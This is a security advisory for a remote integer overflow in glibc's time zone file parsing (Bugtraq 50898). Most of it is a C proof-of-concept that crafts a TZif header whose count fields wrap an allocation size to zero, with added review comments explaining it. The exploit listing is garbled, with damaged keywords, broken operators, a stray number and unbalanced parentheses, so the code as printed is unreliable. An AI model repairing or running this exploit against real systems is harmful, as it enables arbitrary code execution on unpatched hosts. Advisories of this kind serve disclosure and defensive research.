Release date:
Updated on:
Affected Systems:
GNU glibc
Description:
--------------------------------------------------------------------------------
Bugtraq id: 50898
Glibc is the C library implementation used by most Linux operating systems.
GNU glibc has a remote integer overflow vulnerability. An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the current user.
<* Source: dividead
Link: https://bugzilla.redhat.com/show_bug.cgi?id=761245
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
dividead provides the following test method:
# Include <stdio. h>
# Include <stdint. h>
# Include <time. h>
# Include <string. h>
/* NOTE(review): this listing was damaged in extraction (capitalised keywords,
 * spaces inside header names and identifiers) and does not compile as shown. */
/* Magic bytes copied into the first field of the TZif header built in main. */
# Define TZ_MAGIC "TZif"
/* Fills the 4-byte field cp from a 32-bit value; the macro name says most
 * significant byte first. NOTE(review): as printed, the '>' operators compare
 * rather than extract bytes -- the operators appear to have been damaged along
 * with the rest of the listing; confirm against the original report. */
# Define PUT_32BIT_MSB (cp, value )\
Do {\
(Cp) [0] = (value)> 24 ;\
(Cp) [1] = (value)> 16 ;\
(Cp) [2] = (value)> 8 ;\
(Cp) [3] = (value );\
} While (0)
/*
 * Header layout that main fills in and writes out: a 4-byte magic, one
 * version byte, 15 reserved bytes, then six 4-byte count fields.
 * Every count field is file-controlled data, so a parser consuming this
 * header has to treat each count, and any size derived from them, as
 * untrusted input.
 */
Struct tzhead {
Char tzh_magic [4];
Char tzh_version [1];
Char tzh_reserved [15];
Char tzh_ttisgmtcnt [4];
Char tzh_ttisstdcnt [4];
Char tzh_leapcnt [4];
Char tzh_timecnt [4];
Char tzh_typecnt [4];
Char tzh_charcnt [4];
};
/*
 * Declared only so main can take its alignment when rounding the computed
 * size; no object of this type is created in this listing.
 * NOTE(review): presumably mirrors the per-type record the library allocates
 * while parsing -- verify against the glibc source.
 */
Struct ttinfo
{
Long int offset;
Unsigned char isdst;
Unsigned char idx;
Unsigned char isstd;
Unsigned char isgmt;
};
/*
 * Test program from the advisory: builds a TZif header whose count fields are
 * chosen so that a 32-bit size computation over them wraps to zero, then
 * writes the header to standard output.
 *
 * Review point for the parsing side: each count field and the summed
 * allocation size need a wrap-around check before any allocation or read is
 * sized from them; the advisory states that the vendor has released a patch.
 * NOTE(review): the affected glibc code is not shown on this page, so the
 * exact size formula used there is inferred from the arithmetic below.
 */
Int main (void)
{
Struct tzhead edevil;
Int I;
Char * p;
/* NOTE(review): the bare "42" on the next line is not valid C and looks like
 * an extraction artifact (for example a page or line number). */
42
Uint32_t total_size;
Uint32_t evil1, evil2;
/* Fixed part of the header: magic, version 0, and zeroed reserved bytes and
 * gmt/std/leap/type counts. */
Memcpy (edevil. tzh_magic, TZ_MAGIC, sizeof (TZ_MAGIC)-1 );
Edevil. tzh_version [0] = 0;
Memset (edevil. tzh_reserved, 0, sizeof (edevil. tzh_reserved ));
Memset (edevil. tzh_ttisgmtcnt, 0, sizeof (edevil. tzh_ttisgmtcnt ));
Memset (edevil. tzh_ttisstdcnt, 0, sizeof (edevil. tzh_ttisstdcnt ));
Memset (edevil. tzh_leapcnt, 0, sizeof (edevil. tzh_leapcnt ));
Memset (edevil. tzh_typecnt, 0, sizeof (edevil. tzh_typecnt ));
/* Crafted part of the header: a transition count of 500 ... */
Evil1 = 500;
PUT_32BIT_MSB (edevil. tzh_timecnt, evil1 );
/* ... for which the byte size is computed in 32-bit arithmetic as
 * count * (sizeof (time_t) + 1) ... */
Total_size = evil1 * (sizeof (time_t) + 1 );
/* ... and rounded up to the alignment of struct ttinfo.
 * NOTE(review): the parentheses on the next two lines are unbalanced as
 * printed. */
Total_size = (total_size + _ alignof _ (struct ttinfo)-1)
&~ (_ Alignof _ (struct ttinfo)-1 ));
/* The character count is set to the 32-bit negation of that size, so the two
 * values sum to zero modulo 2^32 -- per the original comment, this makes the
 * resulting allocation request zero bytes. */
Evil2 = 0-total_size;
PUT_32BIT_MSB (edevil. tzh_charcnt, evil2 );
/* Write the raw header bytes to standard output. */
P = (char *) & edevil;
For (I = 0; I <sizeof (edevil); I ++)
Printf ("% c", p [I]);
/* Trailing data that the original comment says is what overflows.
 * NOTE(review): the string literal is empty in this listing, so this loop
 * emits nothing as shown. */
For (I = 0; I <50000; I ++)
Printf ("");
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
GNU
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.gnu.org